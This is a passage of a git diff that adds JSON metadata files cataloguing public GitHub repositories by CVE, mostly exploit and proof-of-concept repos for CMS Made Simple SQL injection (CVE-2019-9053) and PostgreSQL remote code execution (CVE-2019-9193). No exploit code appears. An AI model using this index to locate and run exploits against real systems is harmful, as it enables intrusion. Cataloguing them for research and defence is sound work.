"has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442520995, + "name": "CVE-2019-9053", + "full_name": "e-renna\/CVE-2019-9053", + "owner": { + "login": "e-renna", + "id": 115326412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115326412?v=4", + "html_url": "https:\/\/github.com\/e-renna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/e-renna\/CVE-2019-9053", + "description": "CVE-2019-9053 Exploit for Python 3", + "fork": false, + "created_at": "2021-12-28T16:30:12Z", + "updated_at": "2024-03-21T15:09:36Z", + "pushed_at": "2023-05-09T17:00:31Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 547899916, + "name": "Simple_CMS_SQLi", + "full_name": "zmiddle\/Simple_CMS_SQLi", + "owner": { + "login": "zmiddle", + "id": 43040008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43040008?v=4", + "html_url": "https:\/\/github.com\/zmiddle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zmiddle\/Simple_CMS_SQLi", + "description": "This is a exploit for CVE-2019-9053", + "fork": false, + "created_at": "2022-10-08T14:20:48Z", + "updated_at": "2022-10-08T14:22:54Z", + "pushed_at": "2022-10-22T21:23:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557034217, + "name": "CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit", + "full_name": "ELIZEUOPAIN\/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit", + "owner": { + "login": "ELIZEUOPAIN", + "id": 102467898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4", + "html_url": "https:\/\/github.com\/ELIZEUOPAIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit", + "description": null, + "fork": false, + "created_at": "2022-10-25T00:55:12Z", + "updated_at": "2023-07-03T10:59:18Z", + "pushed_at": "2023-06-30T13:21:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 578178850, + "name": "CVE-2019-9053-Python3", + "full_name": "pedrojosenavasperez\/CVE-2019-9053-Python3", + "owner": { + "login": "pedrojosenavasperez", + "id": 115498883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115498883?v=4", + "html_url": "https:\/\/github.com\/pedrojosenavasperez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrojosenavasperez\/CVE-2019-9053-Python3", + "description": "CVE-2019-9053 exploit ported to python3", + "fork": false, + "created_at": "2022-12-14T12:50:54Z", + "updated_at": "2022-12-14T12:56:13Z", + "pushed_at": "2022-12-14T13:05:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646948182, + "name": "CVE-2019-9053-Exploit-Python-3", + "full_name": "Mahamedm\/CVE-2019-9053-Exploit-Python-3", + "owner": { + "login": "Mahamedm", + "id": 52294485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52294485?v=4", + "html_url": "https:\/\/github.com\/Mahamedm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mahamedm\/CVE-2019-9053-Exploit-Python-3", + "description": "The exploit is edited to work with different text encodings and Python 3 and is compatible with CMSMS version 2.2.9 and below.", + "fork": false, + "created_at": "2023-05-29T17:59:09Z", + "updated_at": "2024-09-06T04:25:46Z", + "pushed_at": "2024-06-09T12:39:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662116883, + "name": "CVE-2019-9053", + "full_name": "im-suman-roy\/CVE-2019-9053", + "owner": { + "login": "im-suman-roy", + "id": 102409599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102409599?v=4", + "html_url": "https:\/\/github.com\/im-suman-roy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-suman-roy\/CVE-2019-9053", + "description": "This is the Updated Python3 exploit for CVE-2019-9053", + "fork": false, + "created_at": "2023-07-04T11:47:17Z", + "updated_at": "2023-07-04T11:48:24Z", + "pushed_at": "2023-07-04T11:48:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664209679, + "name": "guncel-cve-2019-9053.py", + "full_name": "bthnrml\/guncel-cve-2019-9053.py", + "owner": { + "login": "bthnrml", + "id": 57349165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57349165?v=4", + "html_url": "https:\/\/github.com\/bthnrml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bthnrml\/guncel-cve-2019-9053.py", + "description": null, + "fork": false, + "created_at": "2023-07-09T08:50:38Z", + "updated_at": "2023-07-09T08:50:39Z", + "pushed_at": "2023-07-09T08:50:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 675828578, + "name": "CVE-2019-9053", + "full_name": "kahluri\/CVE-2019-9053", + "owner": { + "login": "kahluri", + "id": 71148934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71148934?v=4", + "html_url": "https:\/\/github.com\/kahluri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kahluri\/CVE-2019-9053", + "description": "Original Exploit Source: https:\/\/www.exploit-db.com\/exploits\/46635", + "fork": false, + "created_at": "2023-08-07T20:30:19Z", + "updated_at": "2023-08-07T20:33:13Z", + "pushed_at": "2023-08-07T20:34:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 705424290, + "name": "CVE-2019-9053-Python3", + "full_name": "Doc0x1\/CVE-2019-9053-Python3", + "owner": { + "login": "Doc0x1", + "id": 19937034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19937034?v=4", + "html_url": "https:\/\/github.com\/Doc0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Doc0x1\/CVE-2019-9053-Python3", + "description": "Python3 version of the Python2 exploit for CVE-2019-9053", + "fork": false, + "created_at": "2023-10-16T01:09:13Z", + "updated_at": "2023-10-16T01:32:31Z", + "pushed_at": "2023-10-16T01:30:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-9053", + "exploit", + "python", + "python3", + "ubuntu1804" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 705852118, + "name": "CVE-2019-9053", + "full_name": "fernandobortotti\/CVE-2019-9053", + "owner": { + "login": "fernandobortotti", + "id": 61474323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61474323?v=4", + "html_url": "https:\/\/github.com\/fernandobortotti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fernandobortotti\/CVE-2019-9053", + "description": "This repository has the sole purpose of rewriting the CVE-2019-9053 script, which in the original publication is written in Python 2.7. I will be using Python 3.", + "fork": false, + "created_at": "2023-10-16T20:17:38Z", + "updated_at": "2023-10-16T22:51:19Z", + "pushed_at": "2023-10-16T22:51:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721123292, + "name": "CVE-2019-9053", + "full_name": "byrek\/CVE-2019-9053", + "owner": { + "login": "byrek", + "id": 6373670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6373670?v=4", + "html_url": "https:\/\/github.com\/byrek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byrek\/CVE-2019-9053", + "description": "Improved code of Daniele Scanu SQL Injection exploit", + "fork": false, + "created_at": "2023-11-20T12:02:59Z", + "updated_at": "2023-11-20T12:05:09Z", + "pushed_at": "2023-11-20T12:40:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723809169, + "name": "CVE-2019-9053-exploit", + "full_name": "davcwikla\/CVE-2019-9053-exploit", + "owner": { + "login": "davcwikla", + "id": 94928782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94928782?v=4", + "html_url": "https:\/\/github.com\/davcwikla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davcwikla\/CVE-2019-9053-exploit", + "description": "working exploit for CVE-2019-9053 ", + "fork": false, + "created_at": "2023-11-26T20:23:28Z", + "updated_at": "2023-11-26T20:24:35Z", + "pushed_at": "2023-11-26T20:48:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725308023, + "name": "CVE-2019-9053", + "full_name": "BjarneVerschorre\/CVE-2019-9053", + "owner": { + "login": "BjarneVerschorre", + "id": 83133360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83133360?v=4", + "html_url": "https:\/\/github.com\/BjarneVerschorre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BjarneVerschorre\/CVE-2019-9053", + "description": null, + "fork": false, + "created_at": "2023-11-29T21:47:41Z", + "updated_at": "2024-03-25T14:03:12Z", + "pushed_at": "2023-11-30T15:54:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-9053", + "sqli" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761374330, + "name": "CVE-2019-9053-Exploit-in-Python-3", + "full_name": "Jason-Siu\/CVE-2019-9053-Exploit-in-Python-3", + "owner": { + "login": "Jason-Siu", + "id": 34889726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34889726?v=4", + "html_url": "https:\/\/github.com\/Jason-Siu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jason-Siu\/CVE-2019-9053-Exploit-in-Python-3", + "description": null, + "fork": false, + "created_at": "2024-02-21T18:47:21Z", + "updated_at": "2024-02-21T18:47:47Z", + "pushed_at": "2024-02-21T18:56:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801806786, + "name": "CVE-2019-9053-Fixed", + "full_name": "FedericoTorres233\/CVE-2019-9053-Fixed", + "owner": { + "login": "FedericoTorres233", + "id": 80338247, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80338247?v=4", + "html_url": "https:\/\/github.com\/FedericoTorres233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FedericoTorres233\/CVE-2019-9053-Fixed", + "description": "CVE-2019-9054 exploit added support for python3 + bug fixes", + "fork": false, + "created_at": "2024-05-17T00:33:54Z", + "updated_at": "2024-05-18T00:02:48Z", + "pushed_at": "2024-05-17T01:03:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817904120, + "name": "SimpleCTF-UpdatedExploit", + "full_name": "Dh4nuJ4\/SimpleCTF-UpdatedExploit", + "owner": { + "login": "Dh4nuJ4", + "id": 80523098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80523098?v=4", + "html_url": "https:\/\/github.com\/Dh4nuJ4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dh4nuJ4\/SimpleCTF-UpdatedExploit", + "description": "This script is a modified version of the original exploit by Daniele Scanu which exploits an unauthenticated SQL injection vulnerability in CMS Made Simple <= 2.2.10 (CVE-2019-9053).", + "fork": false, + "created_at": "2024-06-20T17:23:22Z", + "updated_at": "2024-06-21T12:50:11Z", + "pushed_at": "2024-06-20T22:02:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819871043, + "name": "CVE-2019-9053-python3-remastered", + "full_name": "TeymurNovruzov\/CVE-2019-9053-python3-remastered", + "owner": { + "login": "TeymurNovruzov", + "id": 118352616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118352616?v=4", + "html_url": "https:\/\/github.com\/TeymurNovruzov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TeymurNovruzov\/CVE-2019-9053-python3-remastered", + "description": "The script has been remastered by Teymur Novruzov to ensure compatibility with Python 3. This tool is intended for educational purposes only. Unauthorized use of this tool on any system or network without permission is illegal. The author is not responsible for any misuse of this tool.", + "fork": false, + "created_at": "2024-06-25T10:47:24Z", + "updated_at": "2024-06-25T10:53:25Z", + "pushed_at": "2024-06-25T10:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840467428, + "name": "CTF-CVE-2019-9053-GTFOBins", + "full_name": "jtoalu\/CTF-CVE-2019-9053-GTFOBins", + "owner": { + "login": "jtoalu", + "id": 89668257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89668257?v=4", + "html_url": "https:\/\/github.com\/jtoalu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jtoalu\/CTF-CVE-2019-9053-GTFOBins", + "description": null, + "fork": false, + "created_at": "2024-08-09T19:20:02Z", + "updated_at": "2024-08-09T21:02:50Z", + "pushed_at": "2024-08-09T21:02:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860886622, + "name": "CMS-Made-Simple-2.2.9-CVE-2019-9053", + "full_name": "Azrenom\/CMS-Made-Simple-2.2.9-CVE-2019-9053", + "owner": { + "login": "Azrenom", + "id": 120582541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120582541?v=4", + "html_url": "https:\/\/github.com\/Azrenom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Azrenom\/CMS-Made-Simple-2.2.9-CVE-2019-9053", + "description": null, + "fork": false, + "created_at": "2024-09-21T12:36:45Z", + "updated_at": "2024-09-21T13:19:15Z", + "pushed_at": "2024-09-21T13:15:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 878999702, + "name": "CVE-2019-9053", + "full_name": "louisthedonothing\/CVE-2019-9053", + "owner": { + "login": "louisthedonothing", + "id": 132141811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132141811?v=4", + "html_url": "https:\/\/github.com\/louisthedonothing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louisthedonothing\/CVE-2019-9053", + "description": "CVE-2019-9053 rewritten in python3 to fix broken syntax. Affects CMS made simple <2.2.10", + "fork": false, + "created_at": "2024-10-26T17:26:05Z", + "updated_at": "2024-10-28T16:31:17Z", + "pushed_at": "2024-10-28T16:31:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9081.json b/2019/CVE-2019-9081.json new file mode 100644 index 0000000000..992c292693 --- /dev/null +++ b/2019/CVE-2019-9081.json @@ -0,0 +1,99 @@ +[ + { + "id": 368085499, + "name": "CVE-2019-9081_PoC", + "full_name": "nth347\/CVE-2019-9081_PoC", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2019-9081_PoC", + "description": "PoC for CVE-2019-9081", + "fork": false, + "created_at": "2021-05-17T06:54:05Z", + "updated_at": "2024-08-12T20:13:04Z", + "pushed_at": "2021-05-17T07:14:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "laravel", + "laravel-framework", + "security-vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422612140, + "name": "cve-2019-9081", + "full_name": "scopion\/cve-2019-9081", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/cve-2019-9081", + "description": null, + "fork": false, + "created_at": "2021-10-29T14:47:39Z", + "updated_at": "2021-10-29T14:51:17Z", + "pushed_at": "2021-10-29T14:51:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 632368797, + "name": "CVE-2019-9081_PoC", + "full_name": "qafdevsec\/CVE-2019-9081_PoC", + "owner": { + "login": "qafdevsec", + "id": 111730727, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111730727?v=4", + "html_url": "https:\/\/github.com\/qafdevsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qafdevsec\/CVE-2019-9081_PoC", + "description": null, + "fork": false, + "created_at": "2023-04-25T09:07:39Z", + "updated_at": "2023-04-25T09:07:54Z", + "pushed_at": "2023-04-25T09:07:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9153.json b/2019/CVE-2019-9153.json new file mode 100644 index 0000000000..75f7c14b54 --- /dev/null +++ b/2019/CVE-2019-9153.json @@ -0,0 +1,33 @@ +[ + { + "id": 207866616, + "name": "opgp-service-cve-2019-9153", + "full_name": "ZenyWay\/opgp-service-cve-2019-9153", + "owner": { + "login": "ZenyWay", + "id": 18708458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18708458?v=4", + "html_url": "https:\/\/github.com\/ZenyWay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZenyWay\/opgp-service-cve-2019-9153", + "description": "investigate vulnerability of opgp-service to message signature bypass (CVE-2019-9153) of openpgp", + "fork": false, + "created_at": "2019-09-11T17:17:03Z", + "updated_at": "2019-09-11T17:38:24Z", + "pushed_at": "2023-01-04T09:58:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9184.json b/2019/CVE-2019-9184.json new file mode 100644 index 0000000000..03d987ad17 --- /dev/null +++ b/2019/CVE-2019-9184.json @@ -0,0 +1,33 @@ +[ + { + "id": 175870177, + "name": "cve-2019-9184", + "full_name": "cved-sources\/cve-2019-9184", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2019-9184", + "description": "cve-2019-9184", + "fork": false, + "created_at": "2019-03-15T18:12:49Z", + "updated_at": "2021-04-15T22:56:25Z", + "pushed_at": "2021-04-15T22:56:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9193.json b/2019/CVE-2019-9193.json new file mode 100644 index 0000000000..1f59947c21 --- /dev/null +++ b/2019/CVE-2019-9193.json @@ -0,0 +1,227 @@ +[ + { + "id": 239892391, + "name": "cve-2019-9193", + "full_name": "wkjung0624\/cve-2019-9193", + "owner": { + "login": "wkjung0624", + "id": 35141349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35141349?v=4", + "html_url": "https:\/\/github.com\/wkjung0624", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wkjung0624\/cve-2019-9193", + "description": "PostgreSQL Remote Code Executuon", + "fork": false, + "created_at": "2020-02-12T00:17:58Z", + "updated_at": "2022-09-20T14:37:22Z", + "pushed_at": "2021-04-16T05:57:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475618555, + "name": "CVE-2019-9193", + "full_name": "b4keSn4ke\/CVE-2019-9193", + "owner": { + "login": "b4keSn4ke", + "id": 44183775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44183775?v=4", + "html_url": "https:\/\/github.com\/b4keSn4ke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4keSn4ke\/CVE-2019-9193", + "description": "CVE-2019–9193 - PostgreSQL 9.3-12.3 Authenticated Remote Code Execution", + "fork": false, + "created_at": "2022-03-29T21:02:02Z", + "updated_at": "2024-09-28T21:21:50Z", + "pushed_at": "2022-05-26T23:00:33Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "exploitation", + "exploits", + "poc", + "python", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 6, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565341010, + "name": "CVE-2019-9193-PostgreSQL-9.3-11.7", + "full_name": "chromanite\/CVE-2019-9193-PostgreSQL-9.3-11.7", + "owner": { + "login": "chromanite", + "id": 26741875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26741875?v=4", + "html_url": "https:\/\/github.com\/chromanite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chromanite\/CVE-2019-9193-PostgreSQL-9.3-11.7", + "description": "PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) ", + "fork": false, + "created_at": "2022-11-13T04:28:55Z", + "updated_at": "2022-11-13T04:30:05Z", + "pushed_at": "2022-11-13T04:30:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 596184870, + "name": "CVE-2019-9193", + "full_name": "paulotrindadec\/CVE-2019-9193", + "owner": { + "login": "paulotrindadec", + "id": 94475244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94475244?v=4", + "html_url": "https:\/\/github.com\/paulotrindadec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paulotrindadec\/CVE-2019-9193", + "description": null, + "fork": false, + "created_at": "2023-02-01T16:41:15Z", + "updated_at": "2023-04-26T09:58:01Z", + "pushed_at": "2023-02-01T17:04:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868553994, + "name": "CVE-2019-9193", + "full_name": "geniuszlyy\/CVE-2019-9193", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2019-9193", + "description": "is a PoC tool designed to exploit an authenticated Remote Code Execution (RCE) vulnerability in specific versions of PostgreSQL (9.3 - 11.7)", + "fork": false, + "created_at": "2024-10-06T17:16:44Z", + "updated_at": "2024-10-21T08:15:11Z", + "pushed_at": "2024-10-06T17:45:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868729300, + "name": "CVE-2019-9193", + "full_name": "AxthonyV\/CVE-2019-9193", + "owner": { + "login": "AxthonyV", + "id": 141282212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141282212?v=4", + "html_url": "https:\/\/github.com\/AxthonyV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AxthonyV\/CVE-2019-9193", + "description": "PoC tool designed to exploit an authenticated Remote Code Execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7)", + "fork": false, + "created_at": "2024-10-07T04:40:51Z", + "updated_at": "2024-10-23T16:09:13Z", + "pushed_at": "2024-10-07T04:41:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868897769, + "name": "CVE-2019-9193", + "full_name": "A0be\/CVE-2019-9193", + "owner": { + "login": "A0be", + "id": 184107161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184107161?v=4", + "html_url": "https:\/\/github.com\/A0be", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A0be\/CVE-2019-9193", + "description": null, + "fork": false, + "created_at": "2024-10-07T11:28:34Z", + "updated_at": "2024-10-07T11:29:37Z", + "pushed_at": "2024-10-07T11:29:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9194.json b/2019/CVE-2019-9194.json new file mode 100644 index 0000000000..5da2a7a36f --- /dev/null +++ b/2019/CVE-2019-9194.json @@ -0,0 